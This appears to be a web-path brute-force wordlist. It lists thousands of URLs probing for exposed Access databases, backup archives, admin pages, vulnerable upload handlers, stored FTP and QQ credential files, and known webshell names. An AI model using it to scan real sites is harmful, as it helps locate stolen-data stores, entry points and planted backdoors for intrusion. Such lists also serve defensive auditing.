/bbs/data/dvbbs6.mdb 
/youxi_wangyou/ 
/php/bak/dede_admin.txt 
/php/bak/z9v8dede_admin.txt 
/images/z9v8yesitis.asp 
/bbs/z9v8cmd.asp 
/lipinwanju/ 
/bbs/bbs/ 
/key.asp 
/Shipin_Yinliao/ 
/z9v8conn.asp.bak 
/z9v8digshell0.asp 
/123.txt 
/\xd0\xc2\xba\xf3\xd7\xba 
/xingzuo_suanming/ 
/userregpost.asp 
/bbs/database/bbsxp.mdb 
/database/BBSXP2007.mdb 
/sf.rar 
/Zuqiu_Tianxia/1025.htm 
/bbs/DV_plus/marry/plus_marry_db.asp 
/caijinggushi/ 
/xiaoyuan_gaoxiao/1322.htm 
/bbs/Databackup/dvbbs7_Backup.mdb 
mh/data.asp 
/database/companydatabase.mdb 
/database/%23newasp.mdb 
/boke/data/dvboke.asp 
/database/bbsxp.mdb 
/Mirserver4.rar 
/cnhwwdata/cnhww.mdb 
/ShowHost.asp 
/z9v8xiao.asp 
/data.asp 
/bbs/database/BBSXP2007.mdb 
/z9v8shell.asp 
/bbs/boke/data/dvboke.asp 
/z9v8digshell2.asp 
/shujuku/movie.mdb 
/mhxy/data.asp 
/yinyue_mp3/ 
/GOOGLE1bb9e40669bc959a.html 
/database/21asp.mdb 
/m 
/data/music.mdb 
/db/com02.mdb 
/sql.rar 
/database/jobcom.mdb 
/data/Dxbbs7.mdb 
/database/useryyewuhjdjhgutwehdskjwewyt.mdb 
/kyuanma.gif 
/zt/ztqdata.mdb 
/thread-16-1-1.html 
/ztqdata.mdb 
/data/team.mdb 
/Data/LeadBBS.mdb 
/database/%23ncms.mdb 
/edit/upload.asp 
/upfilea.asp 
/images/kyuanma.jpg 
/flash/kyuanma.gif 
/uploadfiles/kyuanma.gif 
/p 
/images/kyuanma.gif 
/swf/kyuanma.swf 
/KingServer.rar 
/kyuanma.swf 
/mirserver/mirserver.rar 
/msmir/msmir.mdb 
/movie.rar 
/flsah/kyuanma.swf 
/Wol2008.rar 
/hj.rar 
/logo.gif 
/images/1.rmvb 
/admin/edit/upload.asp 
/xy2data.mdb 
/z9v8upfile_adpic.asp 
/haohj.rar 
/piay.791.1587.0 
/z9v8upfile_article.asp 
/shuma_shishang/ 
/z9v8qqhao.txt 
/vod/z9v8upfile.asp 
/z9v8upfile.htm 
/320.rar 
/z9v8qqcjb.txt 
/pwd.txt 
/z9v8upfile_soft.asp 
/undefined 
/hf.rar 
/z9v8manage/login.asp 
/z9v8upfile_flash.asp 
/z9v8index.asp 
/z9v8upfile_photo.asp 
/database/PowerEasy4.mdb 
/yiliaobaojian/ 
/admin/uploadPic.asp 
/z9v8upload_Dialog.asp 
/lf.rar 
/130.rar 
/120.rar 
/flash/downfile.asp 
/kf.rar 
/z9v8pwd.txt 
/alexa/z9v8fadmy.asa 
/z9v8qq123.txt 
/z9v8zz.asp 
/asasasa 
/zz.asp 
/upload_Dialog.asp 
/admin/z9v8uploadPic.asp 
/mtv/upfile.asp 
/450.rar 
/weather/cacheindex_110100.txt 
/qq123.txt 
/yf.rar 
/upfile.htm 
/alexa/fadmy.asa 
/flash-show/index.htm 
/mtv/z9v8upfile.asp 
/boke_wangzhai/index.htm 
/z9v8upload.asp 
/music/upfile.asp 
/z9v8pwd.asp 
/qqmima.txt 
/kyuanma.jpg 
/ll.rar 
/vod/upfile.asp 
/z9v8qqmima.txt 
/play,791,1587, 
/msmir_net.mdb 
/MirCMS_ADB.mdb 
/upimg/media/yinlng.swf 
/music/z9v8upfile.asp 
/qqhao.asp 
/VIEWGOOD.rar 
/xingzuo_suanming/index.htm 
/123.rar 
/install.asp 
/admin/webeditor/db/ewebeditor.mdb 
/1100.rar 
/111.rar 
/bfq.shtml 
/admin/eWebEditor/db/ewebeditor.mdb 
/lvyouchuxing/893.htm 
/thread-49-1-1.html 
/shouji_tongxing/index.htm 
/qqcjb.txt 
/luntan_shequ/index.htm 
/bcastr.xml 
/mud3.rar 
/vcastr.xml 
/Jiaotong_Wuliu/ 
/htmledit/db/ewebeditor.mdb 
/admin/web/db/ewebeditor.mdb 
/qqhao.txt 
/kexue_jishu/ 
/pwd.asp 
/Wol2008 
/movie_ 
/manage/webditor/db/ewebeditor.mdb 
/%23.rar 
/jh1/hsh.mdb 
/CAurl11.txt 
/1.rar 
/xinwenbaokan/ 
/manage/htmledit/db/ewebeditor.mdb 
/z9v8qqhao.asp 
/WolServer 
/media.rar 
/web/db/ewebeditor.mdb 
/webmedia.rar 
/webvod.rar 
/mp3/about:blank 
/Jianzhan_Sheji/index.htm 
/liaotian_qq/743.htm 
/_vti_bin/owssvr.dll 
/tq.htm 
/admin/admin_template.asp 
/yuanma/blog.rar 
/index/ 
/manager/webeditor/admin_login.asp 
/14.rar 
/12.rar 
/admin/admin_ads.asp 
/Heike_Anquan/index.htm 
/xyqdata%23.mdb 
/Databases/0791idc.mdb 
/manager/editor/admin_login.asp 
/Guowai_Wangzhan/index.htm 
/webroot.rar 
/zhaoshangjiameng/index.htm 
/gl/ewebeditor/admin_login.asp 
/admin 
/templates/n%20class= 
/shopxp/shopxp.mdb 
/Yingjian_Zixun/index.htm 
/register.php 
/Wangba_Lianmeng/index.htm 
/yinxingbaoxian/index.htm 
/config.inc.php 
/heiyubbs.asp 
/admin/admin_mb.asp 
/admin/editor/upload.asp 
/manager/htmleditor/admin_login.asp 
/bbs/upfile_flash.asp 
/manager/ewebeditor/admin_login.asp 
/135.rar 
/template/index.asp/css.css 
/mir2.rar 
/xiangce-heka/index.htm 
/xinwenbaokan/index.htm 
/kuanpin_yingshi/index.htm 
/xyqdata.mdb 
/zt/xy2data.mdb 
/Keji_IT/index.htm 
/ww.rar 
/Cmirserver 
/22.rar 
/z9v8123.asp 
/ztqdata%23.mdb 
/waiyu_xuexi/index.htm 
/Databases/asp99cms.mdb 
/Sousuo_Yinqing/index.htm 
/26591.swf 
/安全手册.txt
/安装.txt
/安装手册.txt
/安装说明.txt
/登陆.asp
/登陆.aspx
/登陆.php
/更新历史.txt
/管理员.asp
/管理员.aspx
/管理员.php
/假地址
/假地址.asp
/假地址.aspx
/假地址.php
/商业注册.txt
/升级说明.txt
/使用手册.txt
/使用说明.txt
/说明.htm
/说明.txt
/说明文档.txt
/說明.txt
/特别感谢.txt
/新建 文本文档.txt
/用户手册.txt
/用户说明.txt
 /heiyu.asa 
/MSOffice/cltreq.asp 
/GameOfmir.rar 
/noresize 
/LeapFTP.rar 
/jiaoyu_peixun/index.htm 
/Data_ACT/Actcms.mdb 
/contact.htm 
/136.rar 
/net.rar 
/Actcms.mdb/Data_ACT 
/back.rar 
/p_data/%23%23qingtiandy_cn.mdb 
/jijinlicai/index.htm 
/yuanma/HSH12.mdb 
/youxi_wangyou/index.htm 
/heiyu.asp 
/bak.rar 
/heiyubbs.asa 
/rencai_zhaopin/index.htm 
/upimg/media/1_071018091728.swf 
/kejian_lunwen/index.htm 
/123456.rar 
/KingServer 
/yl9tinstall/index.php 
/xdnydiy.asp 
/lvyouchuxing/2050.htm 
/pmddmyup.asp 
/attachments/20080906_d4a8de52797dbe30a07525uF04JtyTT1.jpg 
/bbs/q02ddigshell0.asp 
/jt18digshell0.asp 
/Comment.asp 
/NBA_lanqiu/index.htm 
/bbs/ai4ndigshell2.asp 
/bow5diy.asp 
/qte4diy.asp 
/r5nrdigshell0.asp 
/hl/76.html 
/flash-show/ 
/89wjdiy.asp 
/other/2007_jh.htm 
/aiqing_jiaoyou/index.htm 
/r12ydigshell0.asp 
/cert/bazs.cert 
/movie_movie_2980.shtm 
/6ycoqq.txt 
/Gehang_Geye/index.htm 
/mora.aspx 
/static/tb/js/configs.js 
/bbs/p223digshell0.asp 
/bbs/2oindiy.asp 
/hmtleditor/admin_login.asp 
/bbs/mibbdigshell2.asp 
/pj6umyup.asp 
/41x6digshell0.asp 
/ocerdiy.asp 
/afhsdigshell0.asp 
/bbs/hmpmdiy.asp 
/bbs/fl04diy.asp 
/9g42shell.asp 
/bbs/up3xdigshell2.asp 
/mfn7diy.asp 
/sf520.rar 
/bbs/seacdigshell0.asp 
/bbs/s8l2digshell0.asp 
/20081104.zip 
/29370.swf 
/index.htm 
/hl/42.html 
/other/images/r1.gif 
/bbs/blr3digshell2.asp 
/static/tb/style/zyq.css 
/c2jndiy.asp 
/dyi0digshell2.asp 
/sp5rdiy.asp 
/bbs/2nk6digshell2.asp 
/yule_zixun/index.htm 
/bbs/rp44update.asp 
/138f.rar 
/Qiche_Qipei/index.htm 
/hl/69.html 
/bbs/78aodiy.asp 
/dianshidiantai/index.htm 
/comiis_jy01/yyyyy1.jpg 
/6yaqmyup.asp 
/x7esmyup.asp 
/f9camyup.asp 
/shop.rar 
/r01qdiy.asp 
/bbs/cmundigshell0.asp 
/7hsfdigshell0.asp 
/lgj8myup.asp 
/hl/25.html 
/bbs/1qp0digshell2.asp 
/jxfqlog.txt 
/ok2/ 
/bbs/steddiy.asp 
/aba/forumdata/cache/style_50_viewthread.css 
/0x5emyup.asp 
/other/images/GoogleAdSense-468.gif 
/exkndigshell0.asp 
/gwh6digshell2.asp 
/aqqodigshell2.asp 
/8wr8myup.asp 
/a0p7digshell2.asp 
/shop.mdb 
/play%EF%BC%8C5061%EF%BC%8C10128%EF%BC%8C0 
/dc6xdiy.asp 
FlashFXP/Sites.dat 
/lipinwanju/index.htm 
/c4c6diy.asp 
/other/images/r4.gif 
/bizhi_tuku/index.htm 
/cqvyqq2008jh.txt 
/hl/13.html 
/Upfile/2008927183587494.jpg 
/embpdigshell2.asp 
/92vrmyup.asp 
/comiis_jy01/jcmt.jpg 
/hl/11.html 
/bbs/bcnydiy.asp 
/shaonian_ertong/index.htm 
/NewFucker.asp 
/hlledigshell2.asp 
/cq.txt 
/other/Festival.htm 
/o5qwmyup.asp 
/data/bbsgood_speed.mdb 
/hl/27.html 
/hl/55.html 
/kaoshi_zhaosheng/index.htm 
/bbs/pk25digshell2.asp 
/other/images/law.css 
/NewsInfr.asp 
/6qv4myup.asp 
/hl/12.html 
/bbs/70oedigshell2.asp 
/bbs/h6aodigshell0.asp 
/movie_movie_6188.shtm 
/i04cdiy.asp 
/yinyue_mp3/index.htm 
/Fuzhuang_Fushi/index.htm 
/bbs/wjvmdigshell0.asp 
/shishangmeirong/index.htm 
/hl/9.html 
/ft7hdigshell2.asp 
/1dppdiy.asp 
/bbs/252xdigshell0.asp 
/User/User_Article.Asp 
/lingyitansuo/index.htm 
/bbs/geeddigshell2.asp 
/site.zip 
/ch4dcss.asp 
/bbs/vlrhdiy.asp 
/5u3qdigshell0.asp 
/hl/59.html 
/hl/58.html 
/xiaoyuan_gaoxiao/950.htm 
/drnrmyup.asp 
/hzyy.asp 
/hck9diy.asp 
/on0jdigshell2.asp 
/26799.swf 
/bbs/9vlndigshell2.asp 
/hl/23.html 
/liaotian_qq/index.htm 
/dh2.mdb 
/bbs/r3gqcmd.asp 
/bbs/cjp0diy.asp 
/Mianfei_Ziyuan/index.htm 
/chuguo_liuxue/index.htm 
/wr9qdiy.asp 
/xm.asp 
/Sites.dat 
/vip.aspx 
/movie_3131.html 
/bbs/cpcadigshell2.asp 
/bbs/fd0vdigshell2.asp 
/bbs/34aqdigshell2.asp 
/hl/28.html 
/hl/30.html 
/ShowNews.asp 
/bbs/crtkdigshell0.asp 
/hl/84.html 
/26617.swf 
/wxakdiy.asp 
/bbs/aietdiy.asp 
/nanshi_nvxing/index.htm 
/hl/8.html 
/purqdigshell2.asp 
/p36mdigshell0.asp 
/x9d1digshell2.asp 
/7am5xiao.asp 
/blk0digshell2.asp 
/bbs/ehafdigshell0.asp 
eweb 
/xxx.rar 
/b0nndigshell2.asp 
/47rfmyup.asp 
/movie 
/hl/21.html 
/bbs/3pv6css.asp 
/20081060.zip 
/bbs/q46vdiy.asp 
/bbs/j4ycdigshell2.asp 
/bbs/lekrdiy.asp 
/Zuqiu_Tianxia/index.htm 
/igtrdigshell0.asp 
/bbs/34o6digshell0.asp 
/hl/86.html 
/bbs/i8ytdigshell2.asp 
/bbs/yo16digshell2.asp 
/hl/31.html 
/hl/57.html 
/hl/70.html 
/skin/skin_12/style.css 
/hl/46.html 
/bbs/6pakdigshell2.asp 
/1uuqmyup.asp 
/bbs/02omdigshell2.asp 
/110.rar 
/mp5tdigshell0.asp 
/2r8idiy.asp 
/bbs/3uasdiy.asp 
/play/25878094.flv%7Chttp://www.02zz.cn/play/zhaoshang.flv 
/ktvwupdate.asp 
/jjdsdigshell0.asp 
/inc/admindy.asp 
/Upfile/20081053312104.jpg 
/aba/forumdata/cache/style_50_common.css 
/n8ftmyup.asp 
/nbbjdigshell0.asp 
/20081001.zip 
/bbs/ssuydigshell2.asp 
/bbs/y9i2digshell0.asp 
/search.xml 
/hl/80.html 
/upimg/071017/11925F52IZ34N22.jpg 
/aba/editorArea.css 
/comiis_jy01/cheyouyingji_2.jpg 
/templates/default/images/bookmarkv%3E%20%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20class= 
/hl/81.html 
/bbs/78pbdiy.asp 
/play,5061,10128,0http://www.gougou.com/ 
/hl/16.html 
/bbs/y2u8digshell0.asp 
/bbs/c0lldigshell0.asp 
/rrdadiy.asp 
/hl/83.html 
/bbs/00kvdigshell0.asp 
/bbs/x0vydigshell2.asp 
/hl/47.html 
/adminmanage/ewebeditor/admin_login.asp 
/bbs/l5u7digshell0.asp 
/647.swf 
/hl/41.html 
/rukcz_shop_newshop.asp 
/hl/777.html 
/xwsqmyup.asp 
/yay8digshell0.asp 
/hl/22.html 
/2m8ydigshell0.asp 
/t80bdigshell0.asp 
/bbs/djg2digshell0.asp 
/l1ysdigshell2.asp 
/m58xqq.txt 
/ipxudigshell0.asp 
/qa5njinhuQQ.txt 
/bbs/8k57diy.asp 
/hl/24.html 
/bbs/u41bdigshell0.asp 
/tool/escape.htm 
/bbs/ems8digshell0.asp 
/bbs/9ff0diy.asp 
/4tqeqq.txt 
/bbs/mtnbdigshell0.asp 
/10f4digshell0.asp 
/hl/39.html 
/bbs/64cadiy.asp 
/user/ 
/difangfuwu/index.htm 
/bbs/mh6rdigshell2.asp 
/thxkdigshell2.asp 
/dongman_katong/index.htm 
/hl/52.html 
/post.mdb 
/jnqndigshell0.asp 
/rencai_zhaopin/ 
/catalog/1596.htm 
/asaycmd.asp 
/wangshanggouwu/index.htm 
/hl/66.html 
/Huagong_Nengyuan/index.htm 
/r2nhtmdqq.asp 
/xax4myup.asp 
/4p5xdiy.asp 
/Nonglin_Muyu/index.htm 
/bbs/0dfrdigshell2.asp 
/admin.php 
/hl/85.html 
/520.rar 
/bbs/x9wodigshell0.asp 
/shop.zip 
/hl/7.html 
/Shangwu_Maoyi/index.htm 
/awe6digshell2.asp 
/tul5myup.asp 
/1tufmyup.asp 
/bbs/nq31digshell0.asp 
/fangchanjiaju/index.htm 
/qq_dahuala.asp 
/bbs/wovedigshell0.asp 
/hl/88.html 
/c04xdigshell2.asp 
/FCKeditor 
/adminn.php 
/cteqmyup.asp 
/f3wpjinhuQQ.txt 
/hl/64.html 
/ftp1.rar 
/bbs/ot78diy.asp 
/02nfdiy.asp 
/1212.rar 
/1200.rar 
/Gongye_Zhipin/index.htm 
/bbs/rsdydiy.asp 
/bbs/dcjsdigshell0.asp 
/hl/37.html 
/87d6diy.asp 
/d6o4digshell0.asp 
/y057digshell0.asp 
/yeuediy.asp 
/aixin/ 
/20081001.rar 
/80f9digshell0.asp 
/other/images/r3.gif 
/static/tb/js/base.js 
/hl/32.html 
/79hlmyup.asp 
/gamedata/aaddsfedsffdsggfhhdf.asa 
/Yinshua_Chuban/index.htm 
/shehui_wenhua/index.htm 
/pb6odigshell2.asp 
/ucqydigshell2.asp 
/hl/62.html 
/hl/15.html 
/j5rmmyup.asp 
/site.rar 
/30wfdigshell0.asp 
/bbs/5026myup.asp 
/bbs/79aadigshell0.asp 
/yishu_aihao/index.htm 
/2ir9myup.asp 
/bbs/gqekdiy.asp 
/bbs/qsnpdigshell2.asp 
/leapftp.ini 
/tiyu_jianshen/index.htm 
/hl/60.html 
/lm6qdigshell0.asp 
/r11sqq.asp 
/other/images/r2.gif 
/hl/1008.html 
/hl/36.html 
/about.htm 
/hl/18.html 
/x.php 
/bbs/i4yfdiy.asp 
/errydiy.asp 
/dianshidiantai/755.htm 
/xwowdigshell2.asp 
/dy/ 
/other/images/1.gif 
/bfximyup.asp 
/hl/79.html 
/bbs/mkirdigshell0.asp 
/hl/50.html 
/s4u6install/index.php 
/bbs/29ffdiy.asp 
/gvo1digshell2.asp 
/lu2lqq2008jh.txt 
/admin/enda.asp 
/hl/56.html 
/bbs/m4yidigshell0.asp 
/default.htm 
/tv28qq.txt 
/yingyangmeishi/index.htm 
/hl/44.html 
/bbs/mbpddiy.asp 
/hl/77.html 
/hl/74.html 
/agundigshell2.asp 
/4fpndigshell0.asp 
/5xc4diy.asp 
/jjs4digshell0.asp 
/z.asp 
/3upxmyup.asp 
/dv8ediy.asp 
/blog/index.php 
/mhbbdiy.asp 
/aba/editor/include/js/common.js 
/images/ggmm668/logo.jpg 
/jg2rdigshell0.asp 
/hl/34.html 
/comiis_jy01/cheyouyingji_1.jpg 
/vob3digshell2.asp 
/mp3/play.asp 
/ho7fdigshell2.asp 
/1iyydiy.asp 
/superbird.php 
/bbs/f0hfdiy.asp 
/6crwdiy.asp 
/77169.txt 
/ji8sqq.txt 
/bbs/gpg6digshell2.asp 
/bbs/nk7ldigshell2.asp 
/bbs/cy0adigshell2.asp 
/9knejinhuQQ2007.txt 
/hl/67.html 
/zhaopin.htm 
/hl/61.html 
/manage/Manage.asp 
/thread-84-1-1.html 
/bbs/p5addigshell2.asp 
/1hmmdigshell2.asp 
/gjrfdigshell2.asp 
/tt10digshell0.asp 
/other/images/r5.gif 
/hl/63.html 
/comiis_jy01/a2.jpg 
/hl/54.html 
/play,6183,12374,19%20%20// 
/bbs/02kvdigshell2.asp 
/ssh3digshell0.asp 
/ajtldigshell0.asp 
/hl/53.html 
/caipiaobocai/index.htm 
/m1pidigshell0.asp 
/8vt2digshell0.asp 
/126bqq2008jh.txt 
/Images/config_inc.asp 
/hl/78.html 
/hl/75.html 
/v6krdigshell0.asp 
/bbs/0ssvdigshell0.asp 
/11
/111
/11111
/123
/2
/2001
/2002
/2003
/2006
/2007
/2008
/22
/222
/88888
//Admin2
/Sys/Login
/m/ember
/virgin
/vadmin
/cheditor41
/cafe
/cafe/geditor
/cafe/cheditor
/easy_editor
/cheditor4
/htmlarea
/_config
/ahboard
/popup
/popups
/hboard
/MySQL_Admin
/BackOffice
/PGOfficer
/page
/csheditor
/PowerMaster
/geditor
/cheditor
/init
/init.php
/customer
/conn
/connection
/shell
/adminsto
/_Setup
/adminconn
/adminlogon
/admin_logon
/HtmlEditor
/usersystem
/WebEditor
/oci
/oci8
/editEB
/_install
/filemanager
/connectors
//admin/admin
/admin/admin_login
/art
/bbs/down_addsoft
/bbs/post_upfile
/bbs/post_upfile1
/bbs/post_upload
/bbs/post_upload1
/bbs/reg_upload
/bbs/reg_upload1
/bbs/saveup
/bbs/saveup1
/bbs/upfile
/bbs/upfile1
/bbs/upload_soft
/down_addsoft
/dvbbs/down_addsoft
/dvbbs/post_upfile
/dvbbs/post_upfile1
/dvbbs/post_upload
/dvbbs/post_upload1
/dvbbs/reg_upload
/dvbbs/reg_upload1
/dvbbs/saveup
/dvbbs/saveup1
/dvbbs/upfile
/dvbbs/upfile1
/dvbbs/upload_soft
/saveup
/saveup1
/upfile1
/upload_soft
/DataBackup
/PreviewImage
/Skins
/UploadFace
/UploadFile
/dvbbs
/aspcheck
/webmanage
/NF_visual_upfile
/SaveArticle_UpFile
/up2
/up3
/news/user_upfile
/upFile/upfile
/z_visual_upfile
/down_upfile
/ebook
/data/shop
/browser.html
/eweb
/upfile.htm
/conn_xp
/commands
/newmm
/newup
/administrator/login
/administrator/admin
/manage/admin
/member/login
/member/admin
/admin/default/login
/admin/default/admin
/admin/manage/login
/admin/manage/admin
/admin_login/login
/admin_login/admin
/denglu/admin
/guanli/admin
/houtai/admin
/login/admin/admin
/manager/admin
/manage/login
/Data/login
/luntan
/Upfile_SoftPic
/Upfile_Soft
/Upfile_Flash
/uploadok
/uploadfaceok
/softadd
/addsoft
/oa
/upsave
/data/flash
/upfile_class
/inc/upfile_class
/dshell
/saveupload
/uppic
/uploadPic
/uploadPic.inc
/data/data
/upload.jsp
/uploada
/adminn
/WebEdit
/admin_style
/oledit/admin_style
/saveqy
/efwmanager
/conn1
/admin/addNews_ok
/addNews_ok
/Editor/UpLoadCls/SaveUpFile
/Editor/UpLoadCls
/UpLoadCls/SaveUpFile
/UpLoadCls
/bbs/data/dvbbs6
/bbs/data
/data/dvbbs6
/dvbbs6
/manage/uploadPic
/manage/uploadPic.inc
/enter
/comupfile
/cmsadmin/
/admin/vote/control
/vote/control
/zhlogin
/UserReg_Step1
/Register/UserReg_Step1.asp
/Register/UserReg_Step2.asp
/UserReg_Step2
/up_BookPicPro
/ri
/heige
/ReSearch
/AddAward
/SaveAward
/RegSavefiles
/RegPassFiles
/addfile
/user_upload
/Data44
/xiajia.html
/Admin_Help
/user_upfile
/admin/Admin_Index
/htmledit
/admin_NUpFile
/2000
/2009
/2010
/vote
/10
/upfilea
/bak
/cadmin
/2006p
/%23newasp
/newasp
/db/6k
/data/zm_marry
/fdnews
//admin/ydxzdate.asa
/db/play
/mdb
/admin/data/user
/data_jk/joekoe_data
/data/news3000
/data/12912
/starark
/upfile_Other
/upload_xinwenok
/upload_xinwen
/reg1
/upfile_photo
/upfile_adpic
/Upfile_Article 
/Upfile_OrderPic
/Upfile_AdPia 
/Upfile_Articla
/Upfile_Dialog 
/mdb/vcsbook
/databass/datashop 
/datashop
/sf/
/UploadImage1
/UploadImage2
/UploadImage3_upload
/uploadsave
/UserADD
/usermanage
/editor.htm
/AddNews1
/phpMyAdmin1
/phpMyAdmin2
/phpMyAdmin0
/phpMyAdmin1/libraries
/AddUser1
/index1.htm
/index1
/index2.htm
/index2
/newsimagesave
/shell.txt
/hack.txt
/hack
/went
/go
/upLoad_bm1
/upLoad_c1
/blogdata
/functions.php
/includes/functions.php
/msmiradmin
/msmirdata
/downfile
/admin_articlerecyclebin.asp
/chngame/
/ReloadForumCache
/makealltopanc
/admin_fso
/passwd.dat
/system/manage 
/Nclass
/ManageNews
/NewsManage
/NewsAdd
/db1
/%23db1
/xukehan
/Upfile_Product
/user-news
/user-msg
/player
/file_admin_machine
/Fso_Index
/upme
/upme1
/upme2
/upme3
/upme4
/upme5
/upme6
/upme.htm
/upme3.htm
/upme4.htm
/upme5.htm
/upme6.htm
/alluser
/Scan
/2006x
/hrlp.php
/MySql.php
/ShowImage
/ServuX
/Servu
/su
/downcode.com.txt
/upload_files
/licence.txt
/yx
/adminwqlxy
/lutan
/kanxin
/pageCls
/modipass
/lin
/icheck
/isee
/ti
/user_see
/look
/lo
/czwebedit/
/upload_article
/admin86spw
/chkserver
/loadup
/qq
/xin
/wlxj
/wow
/zhengtu
/jqj
/jfwow
/gfwow
/mfwow
/wow1
/wow2
/wuma
/elogin
/admin_server
/modipass2
/ri.html
/mzxiaozi
/mzyanjie.html
/pengwei.html
/zhangyanjie
/jhjh
/managex
/jjmh
/in_file
/freetextbox
/styleedit
/wbtextbox
/frm_
/uu
/hong
/qqhx
/nopass
/ystadmin
/Dvbbs8.0.0_Ac
/Admin8
/um
/admin_home
/pis
/jha
/zt2
/newfile
/dahua
/feedback
/admin_db_backup
/%23ewebeditor
/TXL
/xsjnews.asa
/iframe.htm
/mdbdata
/zx
/zx2
/SaveUploadFile
/lt
/Data_Backup
/94kk
/fly163_user123
/fly163_info123
/fly163_down123
/ccon
/uptp
/wdxc
/ShowImageListFromData
/SimpleImageToData
/tplist
/lxlist
/tpurl
/admin_01
/admin_02
/rc
/hzt
/shengming
/article_add.php
/select_media.php
/BenQ
/add_ad
/dologin
/dologin1
/Register_Confirm
/member1
/user_upfile_save
/ceshi
/Upfile_Start
/Up_Pic
/Admin_Ads
/dh
/ms
/my
/TL
/tx
/wd
/wl
/wm
/qj
/mh
/zt
/cuteeditor
/cute
/CuteSoft_Client
/ImageMap.htm
/InsertEmotion.htm
/Preview.htm
/proII
/db_conn
/indexproii
/EditBoxFile
/uploadimg
/uploadimg.htm
/sysadmin_menu
/lbadmin
/jpg
/file_upload
/hadmin
/engage_edit
/enguser_admin
/enguser_register
/danweiadminpic
/danweiadmineditpic
/countadmin
/contact_admin
/adminuser_myedit
/adminuser_edit
/adminbice
/upfiles
/assistant
/mynews
/addmytrade
/trace
/resAdd
/eqdkp
/nnoc
/Admin_UploadFile
/Upfile_bbs
/upload_bbs
/do/
/Upfile_hotel
/Upfile_room
/0Index
/%23Data%23%23Back.asa
/WinWebMail
/QQtest.txt
/Kuang5_UploadFile
/e_upfile
/spzs
/yq
/zj_up
/upsx
/Ex_Gp_Admin_Data
/Share
/AdminLogin1
/voteapp
/star
/adminss
/editlawbase
/bb0s
/bbsxp70
/cnkbbs
/cq2sbbs001
/dBBS
/fb
/fblogv3.0.3/
/fblog
/hbbbs
/lbbs
/llbbs
/longsbbs
/mblog
/lqblog
/myblog
/TBBS
/youthclub
/yiyabbs
/YxBBs2.1
/ztbbs10sp1
/boss
/fb-admin
/Admin_Index_Left
/img_upload
/saveimg
/Client
/User_Reg2
/pic_upfile
/listpics
/upok
/upok1
/chinaz.com.txt
/masker90
/readme_.txt
/center
/shangchuan
/fileup
/say
/adddoc
/aspSysCheck
/pic_up
/pic_add
/upfile_pic
/rte
/whizzylink.php
/Upfile_File
/upvideo
/web.upload
/include/web.upload
/common/include/web.upload
/PBLog2
/blogDB/PBLog2
/rss
/upload_avatars
/upload1
/old_site
/test_uploadSave
/test_upload
/api
/api/Api_response
/Api_response
/webconfig
/app_data
/92design
/oshb
/adminnote
/klso_data
/%23klso%23vip%23.asa
/wordpress
/PE_detect
/upfile_userface
/freetext
/manager/html
/upphoto
/coman
/imgsave
/my_upphoto.htm
/my_upphoto
/NwebWebEditorDB
/Up1
/systemlilai
/chs
/upload_pic
/cms
/System/Userlogin
/infos_admin
/1ndex
/sxadmin
/fpv_admin
/log1n
/admin_guanli
/wEditor
/aspupload
/Upload_Picture
/Upfile_Picture
/SavePicture
/eWebEditor_V280_Free_sp1
/iXs_Editor
/Upload_Photo
/Zongg
/upshangchuan
/savetofile
/manginto
/opendb
/data%23
/data/data%23
/ServerList.txt
/RSwow.txt
/FileEditor
/Web_Systems
/domain
/datebase.txt
/WebDataBase
/Cn_Product_UpFile
/admin_manage
/sqlin
/Photo/Upfile_Photo
/ma
/muma
/aa
/diy3
/webshell
/ws
/aaa
/dm
/xm
/mmm
/asdf
/hacker
/hate
/luck
/fuckyou
/xiaolu
/d99
/yes
/do
/cao
/c99
/cshell
/woaini
/caonima
/xx
/xxx
/cmd
/aspcmd
/cmdasp
/phpcmd
/command
/spy
/phpspy
/ASPAdmin
/ASPAdmin_A
/myup
/digshell0
/digshell2
/xiao
/default1
/main1
/wish
/zz
/zzz
/upimg
/upimage
/upload_image
/upload_file
/upsoft
/bbs/z_visual_upfile
/forum/upfile
/bbs/down_picupfile
/down_picupload
/admin/admin_upfile
/admin/upfile
/admin/upload
/admin/uploadfaceok
/news/admin/upfile
/admin_upfile
/upload_flash
/Saveannounce_upload
/upflash
/bbs/diy
/UploadSoft/diy
/upload/upload
/mybbs/saveup
/dxxobbs/upload
/img_upfile
/webststem
/master/memmng/login
/Foosun_Data
/ad_aspcheck
/key
/admin%5Fshopxp
/menu
/wyadmin
/adm_uplo
/adm_uplo1
/smallupfile
/fso
/fileshow
/neeao_sqlin
/webdb
/Admin_Race_Super
/back_edit
/access_db
/she
/dai
/diy1
/diy2
/managedl.htm
/som
/links%23.asa
/e3b3ee1b5da271ai.mdb
/tyqiye.asp
/Ameav_Site.mdb
/tksoft.mdb
/Idea_Site.mdb
/Enterprises .mdb
/shop22%23cndata.mdb
/FS400.mdb
/mydatabase.mdb
/Data.asa
/newcloud6.mdb
/%23newasp.mdb
/xzjddown.mdb
/dxxobbs.mdb
/6k.asp 
/snowboy.mdb
/%23mmdata.mdb
/dsvote%23.asa
/%23newasp.asa
/powereasy5.mdb
/Joekoe_CMS_4.0.mdb
/1-blog.mdb
/yiuwekdsodksldfslwifds.mdb
/dvbbs8.mdb
/PowerEasy6.mdb
/scadata.mdb
/com02.mdb
/UserReg.asp
/adffjhfgdfghsdfgsdfghjf.mdb
/mjaqibmugg@1hy9f.mdb
/tyqiye.mdb
/%23%23cyweb_cn.asp
/!@%23$%^&data&~.asp
/%23liaoxd.asp
/%23TZIMS_Ver6.1.mdb
/%23sze7xiaohu.mdb
/%23actee1data.mdb
/data%23bird$.mdb
/%23zxData.project%23.asp
/%23zxData.project%23.mdb
/Fl_Web.mdb
/%23Database.mdb
/%23ruiutend&anxiu.mdb
/DataShop.mdb
/roha.mdb
/Enterprises.mdb
/%23tourdata.asp
/%23tourdatabak.asp
/asp99cms.mdb
/male520backup.mdb
/%23hospital.mdb
/bak%23hospital.mdb
/MeCMS_data.asp
/cnkcms2008.mdb
/%23echuang%23.asp
/zzchn%23da2005.asp
/data_w%23eb_site_2007.mdb
/bonfurniture.mdb
/d0w2b8d3.mdb
/%23db0D97.Mdb
/ice%23.mdb
/TUNGSTENDATA.asp
/%23HxData.mdb
/%23database%23.asp
/0791idc.mdb
/%23mydatazw.mdb
/%23sy%23wgh2008%23.asp
/%23db1.asp
/cpgl.mdb
/zaopin.mdb
/zaopin.asp
/0791idc0.mdb
/%23@data.mdb
/DataShop).asp
/%23fgfdszfasad%23.mdb
/DataShop1.mdb
/%23fdaeg35@%23gds.asp
/%23tyqiye.asp
/%23tyqiyechina.asp
